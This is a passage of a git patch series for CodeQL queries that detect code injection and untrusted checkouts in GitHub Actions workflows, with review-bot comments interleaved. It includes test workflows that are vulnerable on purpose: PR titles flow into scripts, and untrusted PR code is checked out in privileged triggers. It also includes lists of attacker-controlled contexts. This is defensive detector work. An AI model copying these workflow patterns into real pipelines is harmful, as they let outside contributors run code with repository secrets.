insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml new file mode 100644 index 00000000000..8a3b1b02a63 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request_target: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog_from_prt.yml From 9683ae35bcee5b8a9ce3118edf08ca9039cf1044 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:04:57 +0100 Subject: [PATCH 0133/1267] Add tests --- ql/test/query-tests/Security/CWE-094/CodeInjection.expected | 4 ++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 14b0c535ac6..2ad85054803 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
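Review bot: This fixture sits under `CWE-094`, yet the behaviour change in this commit is in `CWE-829/UntrustedCheckout.ql` and the diffstat shows no `UntrustedCheckout.expected` update, so the new caller-trigger logic appears to be untested. Adding the reusable workflow and its caller to `ql/test/query-tests/Security/CWE-829/.github/workflows/`, together with a second caller triggered only by `pull_request`, would cover both the reported and the suppressed case. The `update` job's checkout with `ref: ${{ github.event.pull_request.head.ref }}` is the step the query should flag when the caller is `pull_request_target`.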
@@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -205,6 +208,7 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bdb5ae3ea55..e818ced0c1d 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -204,6 +207,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From 874e45e3e526b1e35415f76b60a1a828bb4eee6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:22:53 +0100 Subject: [PATCH 0134/1267] feat(sources): New sources This PR also adds the ability to not limit a source to a trigger event --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ ql/src/Security/CWE-094/PrivilegedCodeInjection.ql | 1 + 2 files changed, 12 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 00000000000..db3d3759782 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/trilom/file-changes-action + # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` + - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 69ab240616e..32f292f2200 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -24,6 +24,7 @@ where w = source.getNode().asExpr().getEnclosingWorkflow() and ( w instanceof ReusableWorkflow or + source.getNode().(RemoteFlowSource).getATriggerEvent() = "*" or w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, From 06747cd98b7c3d48070ae06be902940f734895cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 21 Mar 2024 14:16:11 +0100 Subject: [PATCH 0135/1267] Add tests for untrusted checkouts in workflow_run triggered workflows --- .../codeql/actions/dataflow/FlowSources.qll | 3 +++ .../workflow_run_untrusted_checkout.yml | 19 +++++++++++++++++++ .../CWE-829/UntrustedCheckout.expected | 2 ++ 3 files changed, 24 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 007ace43bd0..ab2466bc41b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
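Review bot: The comment ties the any-trigger behaviour to `prNumber` being set, but the four rows use `"*"` unconditionally. The new `getATriggerEvent() = "*"` disjunct in `PrivilegedCodeInjection.ql` (next hunk) then accepts these outputs in every workflow, including ones triggered only by `pull_request`. If the model format cannot express the `prNumber` condition, the comment should say so, e.g. `# the model cannot see whether prNumber is set, so "*" over-approximates`. Otherwise alerts labelled as privileged can appear on workflows that the checkout query in this series treats as unprivileged.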
@@ -106,7 +106,10 @@ private predicate isExternalUserControlledWorkflowRun(string context) { [ "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_repository\\.full_name", + "github\\.event\\.workflow_run\\.head_repository\\.name", "github\\.event\\.workflow_run\\.head_commit\\.message", "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml new file mode 100644 index 00000000000..c802355d102 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index cf9d6c01d49..dc457c6a8a7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
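Review bot: `"github\\.event\\.workflow_run\\.head_branch"` is added a second time; it is already the second entry of the set, on the context line just above `display_title`. The duplicate does not change matching but makes the source list harder to audit, so drop the added line and keep the two new `head_repository` entries. `isExternalUserControlledWorkflowRun` starts and ends outside the hunk.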
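Review bot: Both checkout steps take their ref from `github.event.workflow_run.head.sha`, but as far as I know the `workflow_run` payload exposes `head_sha` and `head_branch` rather than a `head` object, so the fixture exercises a path that real workflows do not use. Adding a step with `ref: ${{ github.event.workflow_run.head_sha }}` would show whether the query's ref matching covers the real field. The job-level `if:` also uses a double-quoted string, which Actions expressions do not accept; `'success'` is the valid form.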
@@ -20,3 +20,5 @@ | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2ed3aceddfefcb329bf03335b4d9c6f68b08811e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 22 Mar 2024 13:32:29 +0100 Subject: [PATCH 0136/1267] feat(sources): Do not take triggers into consideration --- .../codeql/actions/dataflow/ExternalFlow.qll | 11 +-- .../codeql/actions/dataflow/FlowSources.qll | 38 ++------- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- .../ext/jitterbit_get-changed-files.model.yml | 14 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++---- .../tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- .../CWE-078/PrivilegedCommandInjection.ql | 10 ++- .../CWE-094/PrivilegedCodeInjection.ql | 10 ++- ql/test/library-tests/test.expected | 82 +++++++++---------- ql/test/library-tests/test.ql | 4 +- .../.github/workflows/pull_request_target.yml | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 ++ 24 files changed, 123 insertions(+), 138 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 08f8b6b9363..c1c93221d1a 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -8,10 +8,9 @@ private import actions * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. */ -predicate sourceModel(string action, string version, string output, string trigger, string kind) { - Extensions::sourceModel(action, version, output, trigger, kind) +predicate sourceModel(string action, string version, string output, string kind) { + Extensions::sourceModel(action, version, output, kind) } /** @@ -39,11 +38,9 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource( - DataFlow::Node source, string sourceType, string fieldName, string trigger -) { +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, trigger, kind) and + sourceModel(action, version, fieldName, kind) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ab2466bc41b..699b5f6f6c3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -18,8 +18,6 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); - abstract string getATriggerEvent(); - override string getThreatModel() { result = "remote" } } 
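Review bot: The column list in the QLDoc above `sourceModel` in ExternalFlow.qll now stops at `output arg`, while the predicate still takes a fourth column, `kind`, that the comment never describes. Judging by the model rows in this patch it is a free-text label for the source, so a line such as ` * - kind: Short description of the tainted data, e.g. "PR changed files"` would complete the list (wording to be confirmed by the author). The comment block starts above the hunk, and `externallyDefinedSource` in the next hunk continues below it.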
@@ -122,33 +120,20 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { - string trigger; - EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) - or - trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and - isExternalUserControlledPullRequest(context) - or - trigger = ["pull_request_review"] and isExternalUserControlledReview(context) - or - trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and - isExternalUserControlledComment(context) - or - trigger = ["gollum"] and isExternalUserControlledGollum(context) - or - trigger = ["push"] and isExternalUserControlledCommit(context) - or - trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) - or - trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } - - override string getATriggerEvent() { result = trigger } } /** 
@@ -156,13 +141,10 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; - string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } override string getSourceType() { result = sourceType } - - override string getATriggerEvent() { result = trigger } } /** @@ -174,6 +156,4 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getAnInput() = this.asExpr() } override string getSourceType() { result = "Composite action input" } - - override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f1657717e04..11b8bf94bca 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -175,7 +175,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -192,7 +192,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom 
@@ -232,7 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom ) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 93ec64b059e..89cf4de0261 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,9 +5,7 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( - string action, string version, string output, string trigger, string kind -); +extensible predicate sourceModel(string action, string version, string output, string kind); /** * Holds if a summary model exists for the given parameters. diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 44897ef3311..4ff387b1c5a 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -9,7 +9,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 34cb56a01ad..aabd5a3ce36 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 
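Review bot: Removing `trigger` from the extensible predicate `sourceModel` in ExternalFlowExtensions.qll changes its arity from five to four, and nothing in this commit records that for model authors. The bundled `ql/lib/ext/*.model.yml` rows are updated here, but a data extension maintained elsewhere that still supplies five-column rows would presumably no longer load, so a change note or pack version bump seems warranted. The QLDoc could also name the columns, for example `/** Holds if a source model exists for (action, version, output, kind). */`.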
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
index c530a3af9b3..638ff449735 100644
--- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"]
+ - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index 2fda092f20a..0aaa1b0722a 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"]
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index a8a54dbda29..3bc1dcc4759 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"]
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"]
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index 6fefec9a4f8..41a9c337f49 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "PR changed files"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index ffde7dc6a91..b6c75a06e57 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"]
